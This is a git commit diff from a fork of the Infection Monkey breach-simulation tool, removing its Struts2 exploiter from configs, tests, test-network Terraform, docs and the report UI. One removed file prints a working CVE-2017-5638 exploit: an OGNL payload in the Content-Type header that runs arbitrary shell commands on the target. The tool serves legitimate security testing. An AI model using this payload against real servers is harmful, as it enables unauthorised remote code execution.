forked from p15670423/monkey
Merge pull request #1873 from guardicore/1869-remove-struts2-exploit
Remove Struts2 exploiter
This commit is contained in:
commit
727f19ecf6
|
@ -54,6 +54,7 @@ Changelog](https://keepachangelog.com/en/1.0.0/).
|
||||||
- 32-bit agents. #1675
|
- 32-bit agents. #1675
|
||||||
- Log path config options. #1761
|
- Log path config options. #1761
|
||||||
- "smb_service_name" option. #1741
|
- "smb_service_name" option. #1741
|
||||||
|
- Struts2 exploiter. #1869
|
||||||
|
|
||||||
### Fixed
|
### Fixed
|
||||||
- A bug in network map page that caused delay of telemetry log loading. #1545
|
- A bug in network map page that caused delay of telemetry log loading. #1545
|
||||||
|
|
|
@ -1,9 +0,0 @@
|
||||||
---
|
|
||||||
title: "Struts2"
|
|
||||||
date: 2020-07-14T08:42:30+03:00
|
|
||||||
draft: false
|
|
||||||
tags: ["exploit", "linux", "windows"]
|
|
||||||
---
|
|
||||||
### Description
|
|
||||||
|
|
||||||
This exploit, CVE-2017-5638, utilizes the Struts 2 Java web framework. The logic is based on [VEX WOO's PoC](https://www.exploit-db.com/exploits/41570).
|
|
|
@ -16,7 +16,6 @@ class Performance(ConfigTemplate):
|
||||||
"SmbExploiter",
|
"SmbExploiter",
|
||||||
"WmiExploiter",
|
"WmiExploiter",
|
||||||
"SSHExploiter",
|
"SSHExploiter",
|
||||||
"Struts2Exploiter",
|
|
||||||
"WebLogicExploiter",
|
"WebLogicExploiter",
|
||||||
"HadoopExploiter",
|
"HadoopExploiter",
|
||||||
"MSSQLExploiter",
|
"MSSQLExploiter",
|
||||||
|
@ -27,8 +26,6 @@ class Performance(ConfigTemplate):
|
||||||
"basic_network.network_analysis.inaccessible_subnets": [
|
"basic_network.network_analysis.inaccessible_subnets": [
|
||||||
"10.2.2.0/30",
|
"10.2.2.0/30",
|
||||||
"10.2.2.8/30",
|
"10.2.2.8/30",
|
||||||
"10.2.2.24/32",
|
|
||||||
"10.2.2.23/32",
|
|
||||||
"10.2.2.21/32",
|
"10.2.2.21/32",
|
||||||
"10.2.2.19/32",
|
"10.2.2.19/32",
|
||||||
"10.2.2.18/32",
|
"10.2.2.18/32",
|
||||||
|
@ -53,8 +50,6 @@ class Performance(ConfigTemplate):
|
||||||
"10.2.2.19",
|
"10.2.2.19",
|
||||||
"10.2.2.20",
|
"10.2.2.20",
|
||||||
"10.2.2.21",
|
"10.2.2.21",
|
||||||
"10.2.2.23",
|
|
||||||
"10.2.2.24",
|
|
||||||
"10.2.2.25",
|
"10.2.2.25",
|
||||||
"10.2.3.55",
|
"10.2.3.55",
|
||||||
"10.2.3.56",
|
"10.2.3.56",
|
||||||
|
|
|
@ -1,19 +0,0 @@
|
||||||
from copy import copy
|
|
||||||
|
|
||||||
from envs.monkey_zoo.blackbox.config_templates.base_template import BaseTemplate
|
|
||||||
from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemplate
|
|
||||||
|
|
||||||
|
|
||||||
class Struts2(ConfigTemplate):
|
|
||||||
|
|
||||||
config_values = copy(BaseTemplate.config_values)
|
|
||||||
|
|
||||||
config_values.update(
|
|
||||||
{
|
|
||||||
"basic.exploiters.exploiter_classes": ["Struts2Exploiter"],
|
|
||||||
"basic_network.scope.depth": 2,
|
|
||||||
"basic_network.scope.subnet_scan_list": ["10.2.2.23", "10.2.2.24"],
|
|
||||||
"internal.network.tcp_scanner.HTTP_PORTS": [80, 8080],
|
|
||||||
"internal.network.tcp_scanner.tcp_target_ports": [80, 8080],
|
|
||||||
}
|
|
||||||
)
|
|
|
@ -7,8 +7,6 @@ GCP_TEST_MACHINE_LIST = {
|
||||||
"mssql-16",
|
"mssql-16",
|
||||||
"mimikatz-14",
|
"mimikatz-14",
|
||||||
"mimikatz-15",
|
"mimikatz-15",
|
||||||
"struts2-23",
|
|
||||||
"struts2-24",
|
|
||||||
"tunneling-9",
|
"tunneling-9",
|
||||||
"tunneling-10",
|
"tunneling-10",
|
||||||
"tunneling-11",
|
"tunneling-11",
|
||||||
|
|
|
@ -22,7 +22,6 @@ from envs.monkey_zoo.blackbox.config_templates.powershell_credentials_reuse impo
|
||||||
from envs.monkey_zoo.blackbox.config_templates.smb_mimikatz import SmbMimikatz
|
from envs.monkey_zoo.blackbox.config_templates.smb_mimikatz import SmbMimikatz
|
||||||
from envs.monkey_zoo.blackbox.config_templates.smb_pth import SmbPth
|
from envs.monkey_zoo.blackbox.config_templates.smb_pth import SmbPth
|
||||||
from envs.monkey_zoo.blackbox.config_templates.ssh import Ssh
|
from envs.monkey_zoo.blackbox.config_templates.ssh import Ssh
|
||||||
from envs.monkey_zoo.blackbox.config_templates.struts2 import Struts2
|
|
||||||
from envs.monkey_zoo.blackbox.config_templates.tunneling import Tunneling
|
from envs.monkey_zoo.blackbox.config_templates.tunneling import Tunneling
|
||||||
from envs.monkey_zoo.blackbox.config_templates.weblogic import Weblogic
|
from envs.monkey_zoo.blackbox.config_templates.weblogic import Weblogic
|
||||||
from envs.monkey_zoo.blackbox.config_templates.wmi_mimikatz import WmiMimikatz
|
from envs.monkey_zoo.blackbox.config_templates.wmi_mimikatz import WmiMimikatz
|
||||||
|
@ -190,10 +189,6 @@ class TestMonkeyBlackbox:
|
||||||
def test_drupal_exploiter(self, island_client):
|
def test_drupal_exploiter(self, island_client):
|
||||||
TestMonkeyBlackbox.run_exploitation_test(island_client, Drupal, "Drupal_exploiter")
|
TestMonkeyBlackbox.run_exploitation_test(island_client, Drupal, "Drupal_exploiter")
|
||||||
|
|
||||||
@pytest.mark.skip(reason="Struts2 exploiter is deprecated")
|
|
||||||
def test_struts_exploiter(self, island_client):
|
|
||||||
TestMonkeyBlackbox.run_exploitation_test(island_client, Struts2, "Struts2_exploiter")
|
|
||||||
|
|
||||||
@pytest.mark.skip(reason="Weblogic exploiter is deprecated")
|
@pytest.mark.skip(reason="Weblogic exploiter is deprecated")
|
||||||
def test_weblogic_exploiter(self, island_client):
|
def test_weblogic_exploiter(self, island_client):
|
||||||
TestMonkeyBlackbox.run_exploitation_test(island_client, Weblogic, "Weblogic_exploiter")
|
TestMonkeyBlackbox.run_exploitation_test(island_client, Weblogic, "Weblogic_exploiter")
|
||||||
|
|
|
@ -14,7 +14,6 @@ from envs.monkey_zoo.blackbox.config_templates.powershell import PowerShell
|
||||||
from envs.monkey_zoo.blackbox.config_templates.smb_mimikatz import SmbMimikatz
|
from envs.monkey_zoo.blackbox.config_templates.smb_mimikatz import SmbMimikatz
|
||||||
from envs.monkey_zoo.blackbox.config_templates.smb_pth import SmbPth
|
from envs.monkey_zoo.blackbox.config_templates.smb_pth import SmbPth
|
||||||
from envs.monkey_zoo.blackbox.config_templates.ssh import Ssh
|
from envs.monkey_zoo.blackbox.config_templates.ssh import Ssh
|
||||||
from envs.monkey_zoo.blackbox.config_templates.struts2 import Struts2
|
|
||||||
from envs.monkey_zoo.blackbox.config_templates.tunneling import Tunneling
|
from envs.monkey_zoo.blackbox.config_templates.tunneling import Tunneling
|
||||||
from envs.monkey_zoo.blackbox.config_templates.weblogic import Weblogic
|
from envs.monkey_zoo.blackbox.config_templates.weblogic import Weblogic
|
||||||
from envs.monkey_zoo.blackbox.config_templates.wmi_mimikatz import WmiMimikatz
|
from envs.monkey_zoo.blackbox.config_templates.wmi_mimikatz import WmiMimikatz
|
||||||
|
@ -45,7 +44,6 @@ CONFIG_TEMPLATES = [
|
||||||
SmbMimikatz,
|
SmbMimikatz,
|
||||||
SmbPth,
|
SmbPth,
|
||||||
Ssh,
|
Ssh,
|
||||||
Struts2,
|
|
||||||
Tunneling,
|
Tunneling,
|
||||||
Weblogic,
|
Weblogic,
|
||||||
WmiMimikatz,
|
WmiMimikatz,
|
||||||
|
|
|
@ -22,8 +22,6 @@ This document describes Infection Monkey’s test network, how to deploy and use
|
||||||
[Nr. 19 WebLogic](#_Toc526517181)<br>
|
[Nr. 19 WebLogic](#_Toc526517181)<br>
|
||||||
[Nr. 21 Scan](#_Toc526517196)<br>
|
[Nr. 21 Scan](#_Toc526517196)<br>
|
||||||
[Nr. 22 Scan](#_Toc526517197)<br>
|
[Nr. 22 Scan](#_Toc526517197)<br>
|
||||||
[Nr. 23 Struts2](#_Toc536021476)<br>
|
|
||||||
[Nr. 24 Struts2](#_Toc536021477)<br>
|
|
||||||
[Nr. 25 Zerologon](#_Toc536021478)<br>
|
[Nr. 25 Zerologon](#_Toc536021478)<br>
|
||||||
[Nr. 3-45 Powershell](#_Toc536021479)<br>
|
[Nr. 3-45 Powershell](#_Toc536021479)<br>
|
||||||
[Nr. 3-46 Powershell](#_Toc536021480)<br>
|
[Nr. 3-46 Powershell](#_Toc536021480)<br>
|
||||||
|
@ -776,74 +774,6 @@ Update all requirements using deployment script:<br>
|
||||||
</tbody>
|
</tbody>
|
||||||
</table>
|
</table>
|
||||||
|
|
||||||
<table>
|
|
||||||
<thead>
|
|
||||||
<tr class="header">
|
|
||||||
<th><p><span id="_Toc536021476" class="anchor"></span>Nr. <strong>23</strong> Struts2</p>
|
|
||||||
<p>(10.2.2.23)</p></th>
|
|
||||||
<th>(Vulnerable)</th>
|
|
||||||
</tr>
|
|
||||||
</thead>
|
|
||||||
<tbody>
|
|
||||||
<tr class="odd">
|
|
||||||
<td>OS:</td>
|
|
||||||
<td><strong>Ubuntu 16.04.05 x64</strong></td>
|
|
||||||
</tr>
|
|
||||||
<tr class="even">
|
|
||||||
<td>Software:</td>
|
|
||||||
<td><p>JDK,</p>
|
|
||||||
<p>struts2 2.3.15.1,</p>
|
|
||||||
<p>tomcat 9.0.0.M9</p></td>
|
|
||||||
</tr>
|
|
||||||
<tr class="odd">
|
|
||||||
<td>Default server’s port:</td>
|
|
||||||
<td>8080</td>
|
|
||||||
</tr>
|
|
||||||
<tr class="even">
|
|
||||||
<td>Server’s config:</td>
|
|
||||||
<td>Default</td>
|
|
||||||
</tr>
|
|
||||||
<tr class="odd">
|
|
||||||
<td>Notes:</td>
|
|
||||||
<td></td>
|
|
||||||
</tr>
|
|
||||||
</tbody>
|
|
||||||
</table>
|
|
||||||
|
|
||||||
<table>
|
|
||||||
<thead>
|
|
||||||
<tr class="header">
|
|
||||||
<th><p><span id="_Toc536021477" class="anchor"></span>Nr. <strong>24</strong> Struts2</p>
|
|
||||||
<p>(10.2.2.24)</p></th>
|
|
||||||
<th>(Vulnerable)</th>
|
|
||||||
</tr>
|
|
||||||
</thead>
|
|
||||||
<tbody>
|
|
||||||
<tr class="odd">
|
|
||||||
<td>OS:</td>
|
|
||||||
<td><strong>Windows 10 x64</strong></td>
|
|
||||||
</tr>
|
|
||||||
<tr class="even">
|
|
||||||
<td>Software:</td>
|
|
||||||
<td><p>JDK,</p>
|
|
||||||
<p>struts2 2.3.15.1,</p>
|
|
||||||
<p>tomcat 9.0.0.M9</p></td>
|
|
||||||
</tr>
|
|
||||||
<tr class="odd">
|
|
||||||
<td>Default server’s port:</td>
|
|
||||||
<td>8080</td>
|
|
||||||
</tr>
|
|
||||||
<tr class="even">
|
|
||||||
<td>Server’s config:</td>
|
|
||||||
<td>Default</td>
|
|
||||||
</tr>
|
|
||||||
<tr class="odd">
|
|
||||||
<td>Notes:</td>
|
|
||||||
<td></td>
|
|
||||||
</tr>
|
|
||||||
</tbody>
|
|
||||||
</table>
|
|
||||||
|
|
||||||
<table>
|
<table>
|
||||||
<thead>
|
<thead>
|
||||||
<tr class="header">
|
<tr class="header">
|
||||||
|
|
|
@ -99,14 +99,6 @@ data "google_compute_image" "scan-22" {
|
||||||
name = "scan-22"
|
name = "scan-22"
|
||||||
project = local.monkeyzoo_project
|
project = local.monkeyzoo_project
|
||||||
}
|
}
|
||||||
data "google_compute_image" "struts2-23" {
|
|
||||||
name = "struts2-23"
|
|
||||||
project = local.monkeyzoo_project
|
|
||||||
}
|
|
||||||
data "google_compute_image" "struts2-24" {
|
|
||||||
name = "struts2-24"
|
|
||||||
project = local.monkeyzoo_project
|
|
||||||
}
|
|
||||||
data "google_compute_image" "zerologon-25" {
|
data "google_compute_image" "zerologon-25" {
|
||||||
name = "zerologon-25"
|
name = "zerologon-25"
|
||||||
project = local.monkeyzoo_project
|
project = local.monkeyzoo_project
|
||||||
|
|
|
@ -480,36 +480,6 @@ resource "google_compute_instance_from_template" "scan-22" {
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
resource "google_compute_instance_from_template" "struts2-23" {
|
|
||||||
name = "${local.resource_prefix}struts2-23"
|
|
||||||
source_instance_template = local.default_ubuntu
|
|
||||||
boot_disk{
|
|
||||||
initialize_params {
|
|
||||||
image = data.google_compute_image.struts2-23.self_link
|
|
||||||
}
|
|
||||||
auto_delete = true
|
|
||||||
}
|
|
||||||
network_interface {
|
|
||||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
|
||||||
network_ip="10.2.2.23"
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
resource "google_compute_instance_from_template" "struts2-24" {
|
|
||||||
name = "${local.resource_prefix}struts2-24"
|
|
||||||
source_instance_template = local.default_windows
|
|
||||||
boot_disk{
|
|
||||||
initialize_params {
|
|
||||||
image = data.google_compute_image.struts2-24.self_link
|
|
||||||
}
|
|
||||||
auto_delete = true
|
|
||||||
}
|
|
||||||
network_interface {
|
|
||||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
|
||||||
network_ip="10.2.2.24"
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
resource "google_compute_instance_from_template" "zerologon-25" {
|
resource "google_compute_instance_from_template" "zerologon-25" {
|
||||||
name = "${local.resource_prefix}zerologon-25"
|
name = "${local.resource_prefix}zerologon-25"
|
||||||
source_instance_template = local.default_windows
|
source_instance_template = local.default_windows
|
||||||
|
|
|
@ -1,90 +0,0 @@
|
||||||
"""
|
|
||||||
Implementation is based on Struts2 jakarta multiparser RCE exploit ( CVE-2017-5638 )
|
|
||||||
code used is from https://www.exploit-db.com/exploits/41570/
|
|
||||||
Vulnerable struts2 versions <=2.3.31 and <=2.5.10
|
|
||||||
"""
|
|
||||||
import http.client
|
|
||||||
import logging
|
|
||||||
import re
|
|
||||||
import ssl
|
|
||||||
import urllib.error
|
|
||||||
import urllib.parse
|
|
||||||
import urllib.request
|
|
||||||
from typing import List, Tuple
|
|
||||||
|
|
||||||
from infection_monkey.exploit.web_rce import WebRCE
|
|
||||||
|
|
||||||
logger = logging.getLogger(__name__)
|
|
||||||
|
|
||||||
DOWNLOAD_TIMEOUT = 300
|
|
||||||
|
|
||||||
|
|
||||||
class Struts2Exploiter(WebRCE):
|
|
||||||
_EXPLOITED_SERVICE = "Struts2"
|
|
||||||
|
|
||||||
def __init__(self, host):
|
|
||||||
super(Struts2Exploiter, self).__init__(host, None)
|
|
||||||
|
|
||||||
def get_exploit_config(self):
|
|
||||||
exploit_config = super(Struts2Exploiter, self).get_exploit_config()
|
|
||||||
exploit_config["dropper"] = True
|
|
||||||
return exploit_config
|
|
||||||
|
|
||||||
@staticmethod
|
|
||||||
def build_potential_urls(ip: str, ports: List[Tuple[str, bool]], extensions=None) -> List[str]:
|
|
||||||
url_list = WebRCE.build_potential_urls(ip, ports)
|
|
||||||
url_list = [Struts2Exploiter.get_redirected(url) for url in url_list]
|
|
||||||
return url_list
|
|
||||||
|
|
||||||
@staticmethod
|
|
||||||
def get_redirected(url):
|
|
||||||
# Returns false if url is not right
|
|
||||||
headers = {"User-Agent": "Mozilla/5.0"}
|
|
||||||
request = urllib.request.Request(url, headers=headers)
|
|
||||||
try:
|
|
||||||
return urllib.request.urlopen(
|
|
||||||
request, context=ssl._create_unverified_context() # noqa: DUO122
|
|
||||||
).geturl()
|
|
||||||
except urllib.error.URLError:
|
|
||||||
logger.error("Can't reach struts2 server")
|
|
||||||
return False
|
|
||||||
|
|
||||||
def exploit(self, url, cmd):
|
|
||||||
"""
|
|
||||||
:param url: Full url to send request to
|
|
||||||
:param cmd: Code to try and execute on host
|
|
||||||
:return: response
|
|
||||||
"""
|
|
||||||
cmd = re.sub(r"\\", r"\\\\", cmd)
|
|
||||||
cmd = re.sub(r"'", r"\\'", cmd)
|
|
||||||
payload = (
|
|
||||||
"%%{(#_='multipart/form-data')."
|
|
||||||
"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
|
|
||||||
"(#_memberAccess?"
|
|
||||||
"(#_memberAccess=#dm):"
|
|
||||||
"((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
|
|
||||||
"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
|
|
||||||
"(#ognlUtil.getExcludedPackageNames().clear())."
|
|
||||||
"(#ognlUtil.getExcludedClasses().clear())."
|
|
||||||
"(#context.setMemberAccess(#dm))))."
|
|
||||||
"(#cmd='%s')."
|
|
||||||
"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
|
|
||||||
"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
|
|
||||||
"(#p=new java.lang.ProcessBuilder(#cmds))."
|
|
||||||
"(#p.redirectErrorStream(true)).(#process=#p.start())."
|
|
||||||
"(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
|
|
||||||
"(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
|
|
||||||
"(#ros.flush())}" % cmd
|
|
||||||
)
|
|
||||||
headers = {"User-Agent": "Mozilla/5.0", "Content-Type": payload}
|
|
||||||
try:
|
|
||||||
request = urllib.request.Request(url, headers=headers)
|
|
||||||
# Timeout added or else we would wait for all monkeys' output
|
|
||||||
page = urllib.request.urlopen(request).read()
|
|
||||||
except AttributeError:
|
|
||||||
# If url does not exist
|
|
||||||
return False
|
|
||||||
except http.client.IncompleteRead as e:
|
|
||||||
page = e.partial.decode()
|
|
||||||
|
|
||||||
return page
|
|
|
@ -18,7 +18,6 @@ BASIC = {
|
||||||
"WmiExploiter",
|
"WmiExploiter",
|
||||||
"SSHExploiter",
|
"SSHExploiter",
|
||||||
"Log4ShellExploiter",
|
"Log4ShellExploiter",
|
||||||
"Struts2Exploiter",
|
|
||||||
"WebLogicExploiter",
|
"WebLogicExploiter",
|
||||||
"HadoopExploiter",
|
"HadoopExploiter",
|
||||||
"MSSQLExploiter",
|
"MSSQLExploiter",
|
||||||
|
|
|
@ -53,15 +53,6 @@ EXPLOITER_CLASSES = {
|
||||||
"link": "https://www.guardicore.com/infectionmonkey/docs/reference"
|
"link": "https://www.guardicore.com/infectionmonkey/docs/reference"
|
||||||
"/exploiters/sshexec/",
|
"/exploiters/sshexec/",
|
||||||
},
|
},
|
||||||
{
|
|
||||||
"type": "string",
|
|
||||||
"enum": ["Struts2Exploiter"],
|
|
||||||
"title": "Struts2 Exploiter",
|
|
||||||
"safe": True,
|
|
||||||
"info": "Exploits struts2 java web framework. CVE-2017-5638. Logic based on "
|
|
||||||
"https://www.exploit-db.com/exploits/41570 .",
|
|
||||||
"link": "https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/struts2/",
|
|
||||||
},
|
|
||||||
{
|
{
|
||||||
"type": "string",
|
"type": "string",
|
||||||
"enum": ["WebLogicExploiter"],
|
"enum": ["WebLogicExploiter"],
|
||||||
|
|
|
@ -81,7 +81,6 @@ class AWSExporter(Exporter):
|
||||||
"shared_passwords_domain": AWSExporter._handle_shared_passwords_domain_issue,
|
"shared_passwords_domain": AWSExporter._handle_shared_passwords_domain_issue,
|
||||||
"shared_admins_domain": AWSExporter._handle_shared_admins_domain_issue,
|
"shared_admins_domain": AWSExporter._handle_shared_admins_domain_issue,
|
||||||
"strong_users_on_crit": AWSExporter._handle_strong_users_on_crit_issue,
|
"strong_users_on_crit": AWSExporter._handle_strong_users_on_crit_issue,
|
||||||
ExploiterDescriptorEnum.STRUTS2.value.class_name: AWSExporter._handle_struts2_issue,
|
|
||||||
ExploiterDescriptorEnum.WEBLOGIC.value.class_name: AWSExporter._handle_weblogic_issue,
|
ExploiterDescriptorEnum.WEBLOGIC.value.class_name: AWSExporter._handle_weblogic_issue,
|
||||||
ExploiterDescriptorEnum.HADOOP.value.class_name: AWSExporter._handle_hadoop_issue,
|
ExploiterDescriptorEnum.HADOOP.value.class_name: AWSExporter._handle_hadoop_issue,
|
||||||
}
|
}
|
||||||
|
@ -387,24 +386,6 @@ class AWSExporter(Exporter):
|
||||||
instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
|
instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
|
||||||
)
|
)
|
||||||
|
|
||||||
@staticmethod
|
|
||||||
def _handle_struts2_issue(issue, instance_arn):
|
|
||||||
|
|
||||||
return AWSExporter._build_generic_finding(
|
|
||||||
severity=10,
|
|
||||||
title="Struts2 servers are vulnerable to remote code execution.",
|
|
||||||
description="Upgrade Struts2 to version 2.3.32 or 2.5.10.1 or any later versions.",
|
|
||||||
recommendation="Struts2 server at {machine} ({ip_address}) is vulnerable to "
|
|
||||||
"remote code execution attack."
|
|
||||||
"The attack was made possible because the server is using an old "
|
|
||||||
"version of Jakarta based file "
|
|
||||||
"upload Multipart parser.".format(
|
|
||||||
machine=issue["machine"], ip_address=issue["ip_address"]
|
|
||||||
),
|
|
||||||
instance_arn=instance_arn,
|
|
||||||
instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
|
|
||||||
)
|
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def _handle_weblogic_issue(issue, instance_arn):
|
def _handle_weblogic_issue(issue, instance_arn):
|
||||||
|
|
||||||
|
|
|
@ -28,7 +28,6 @@ class ExploiterDescriptorEnum(Enum):
|
||||||
SMB = ExploiterDescriptor("SmbExploiter", "SMB Exploiter", CredExploitProcessor)
|
SMB = ExploiterDescriptor("SmbExploiter", "SMB Exploiter", CredExploitProcessor)
|
||||||
WMI = ExploiterDescriptor("WmiExploiter", "WMI Exploiter", CredExploitProcessor)
|
WMI = ExploiterDescriptor("WmiExploiter", "WMI Exploiter", CredExploitProcessor)
|
||||||
SSH = ExploiterDescriptor("SSHExploiter", "SSH Exploiter", CredExploitProcessor)
|
SSH = ExploiterDescriptor("SSHExploiter", "SSH Exploiter", CredExploitProcessor)
|
||||||
STRUTS2 = ExploiterDescriptor("Struts2Exploiter", "Struts2 Exploiter", ExploitProcessor)
|
|
||||||
WEBLOGIC = ExploiterDescriptor(
|
WEBLOGIC = ExploiterDescriptor(
|
||||||
"WebLogicExploiter", "Oracle WebLogic Exploiter", ExploitProcessor
|
"WebLogicExploiter", "Oracle WebLogic Exploiter", ExploitProcessor
|
||||||
)
|
)
|
||||||
|
|
|
@ -20,7 +20,6 @@ import guardicoreLogoImage from '../../images/guardicore-logo.png'
|
||||||
import {faExclamationTriangle} from '@fortawesome/free-solid-svg-icons';
|
import {faExclamationTriangle} from '@fortawesome/free-solid-svg-icons';
|
||||||
import '../../styles/App.css';
|
import '../../styles/App.css';
|
||||||
import {smbPasswordReport, smbPthReport} from './security/issues/SmbIssue';
|
import {smbPasswordReport, smbPthReport} from './security/issues/SmbIssue';
|
||||||
import {struts2IssueOverview, struts2IssueReport} from './security/issues/Struts2Issue';
|
|
||||||
import {webLogicIssueOverview, webLogicIssueReport} from './security/issues/WebLogicIssue';
|
import {webLogicIssueOverview, webLogicIssueReport} from './security/issues/WebLogicIssue';
|
||||||
import {hadoopIssueOverview, hadoopIssueReport} from './security/issues/HadoopIssue';
|
import {hadoopIssueOverview, hadoopIssueReport} from './security/issues/HadoopIssue';
|
||||||
import {mssqlIssueOverview, mssqlIssueReport} from './security/issues/MssqlIssue';
|
import {mssqlIssueOverview, mssqlIssueReport} from './security/issues/MssqlIssue';
|
||||||
|
@ -78,11 +77,6 @@ class ReportPageComponent extends AuthComponent {
|
||||||
},
|
},
|
||||||
[this.issueContentTypes.TYPE]: this.issueTypes.DANGER
|
[this.issueContentTypes.TYPE]: this.issueTypes.DANGER
|
||||||
},
|
},
|
||||||
'Struts2Exploiter': {
|
|
||||||
[this.issueContentTypes.OVERVIEW]: struts2IssueOverview,
|
|
||||||
[this.issueContentTypes.REPORT]: struts2IssueReport,
|
|
||||||
[this.issueContentTypes.TYPE]: this.issueTypes.DANGER
|
|
||||||
},
|
|
||||||
'WebLogicExploiter': {
|
'WebLogicExploiter': {
|
||||||
[this.issueContentTypes.OVERVIEW]: webLogicIssueOverview,
|
[this.issueContentTypes.OVERVIEW]: webLogicIssueOverview,
|
||||||
[this.issueContentTypes.REPORT]: webLogicIssueReport,
|
[this.issueContentTypes.REPORT]: webLogicIssueReport,
|
||||||
|
|
|
@ -1,26 +0,0 @@
|
||||||
import React from 'react';
|
|
||||||
import CollapsibleWellComponent from '../CollapsibleWell';
|
|
||||||
|
|
||||||
export function struts2IssueOverview() {
|
|
||||||
return (<li>Struts2 servers are vulnerable to remote code execution. (<a
|
|
||||||
href="https://cwiki.apache.org/confluence/display/WW/S2-045">
|
|
||||||
CVE-2017-5638</a>)</li>)
|
|
||||||
}
|
|
||||||
|
|
||||||
export function struts2IssueReport(issue) {
|
|
||||||
return (
|
|
||||||
<>
|
|
||||||
Upgrade Struts2 to version 2.3.32 or 2.5.10.1 or any later versions.
|
|
||||||
<CollapsibleWellComponent>
|
|
||||||
Struts2 server at <span className="badge badge-primary">{issue.machine}</span> (<span
|
|
||||||
className="badge badge-info" style={{margin: '2px'}}>{issue.ip_address}</span>) is vulnerable to <span
|
|
||||||
className="badge badge-danger">remote code execution</span> attack.
|
|
||||||
<br/>
|
|
||||||
The attack was made possible because the server is using an old version of Jakarta based file upload
|
|
||||||
Multipart parser. For possible work-arounds and more info read <a
|
|
||||||
href="https://cwiki.apache.org/confluence/display/WW/S2-045"
|
|
||||||
>here</a>.
|
|
||||||
</CollapsibleWellComponent>
|
|
||||||
</>
|
|
||||||
);
|
|
||||||
}
|
|
|
@ -57,7 +57,6 @@
|
||||||
{"name": "DrupalExploiter", "supported_os": ["linux", "windows"], "options": {}},
|
{"name": "DrupalExploiter", "supported_os": ["linux", "windows"], "options": {}},
|
||||||
{"name": "HadoopExploiter", "supported_os": ["linux", "windows"], "options": {}},
|
{"name": "HadoopExploiter", "supported_os": ["linux", "windows"], "options": {}},
|
||||||
{"name": "ShellShockExploiter", "supported_os": ["linux"], "options": {}},
|
{"name": "ShellShockExploiter", "supported_os": ["linux"], "options": {}},
|
||||||
{"name": "Struts2Exploiter", "supported_os": ["linux", "windows"], "options": {}},
|
|
||||||
{"name": "WebLogicExploiter", "supported_os": ["linux", "windows"], "options": {}},
|
{"name": "WebLogicExploiter", "supported_os": ["linux", "windows"], "options": {}},
|
||||||
{"name": "ZerologonExploiter", "supported_os": ["windows"], "options": {}}
|
{"name": "ZerologonExploiter", "supported_os": ["windows"], "options": {}}
|
||||||
]
|
]
|
||||||
|
|
|
@ -49,7 +49,6 @@
|
||||||
"SmbExploiter",
|
"SmbExploiter",
|
||||||
"WmiExploiter",
|
"WmiExploiter",
|
||||||
"SSHExploiter",
|
"SSHExploiter",
|
||||||
"Struts2Exploiter",
|
|
||||||
"ZerologonExploiter",
|
"ZerologonExploiter",
|
||||||
"WebLogicExploiter",
|
"WebLogicExploiter",
|
||||||
"HadoopExploiter",
|
"HadoopExploiter",
|
||||||
|
|
|
@ -5,7 +5,6 @@
|
||||||
"SmbExploiter",
|
"SmbExploiter",
|
||||||
"WmiExploiter",
|
"WmiExploiter",
|
||||||
"SSHExploiter",
|
"SSHExploiter",
|
||||||
"Struts2Exploiter",
|
|
||||||
"WebLogicExploiter",
|
"WebLogicExploiter",
|
||||||
"HadoopExploiter",
|
"HadoopExploiter",
|
||||||
"MSSQLExploiter",
|
"MSSQLExploiter",
|
||||||
|
|
|
@ -202,7 +202,6 @@ def test_format_config_for_agent__exploiters(flat_monkey_config):
|
||||||
{"name": "DrupalExploiter", "supported_os": [], "options": {}},
|
{"name": "DrupalExploiter", "supported_os": [], "options": {}},
|
||||||
{"name": "HadoopExploiter", "supported_os": ["linux", "windows"], "options": {}},
|
{"name": "HadoopExploiter", "supported_os": ["linux", "windows"], "options": {}},
|
||||||
{"name": "Log4ShellExploiter", "supported_os": ["linux", "windows"], "options": {}},
|
{"name": "Log4ShellExploiter", "supported_os": ["linux", "windows"], "options": {}},
|
||||||
{"name": "Struts2Exploiter", "supported_os": [], "options": {}},
|
|
||||||
{"name": "WebLogicExploiter", "supported_os": [], "options": {}},
|
{"name": "WebLogicExploiter", "supported_os": [], "options": {}},
|
||||||
{"name": "ZerologonExploiter", "supported_os": ["windows"], "options": {}},
|
{"name": "ZerologonExploiter", "supported_os": ["windows"], "options": {}},
|
||||||
],
|
],
|
||||||
|
|
|
@ -56,7 +56,6 @@ credential_type # unused variable (monkey/monkey_island/cc/services/reporting/i
|
||||||
password_restored # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_report_info.py:23)
|
password_restored # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_report_info.py:23)
|
||||||
SSH # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:30)
|
SSH # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:30)
|
||||||
SAMBACRY # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:31)
|
SAMBACRY # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:31)
|
||||||
STRUTS2 # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:39)
|
|
||||||
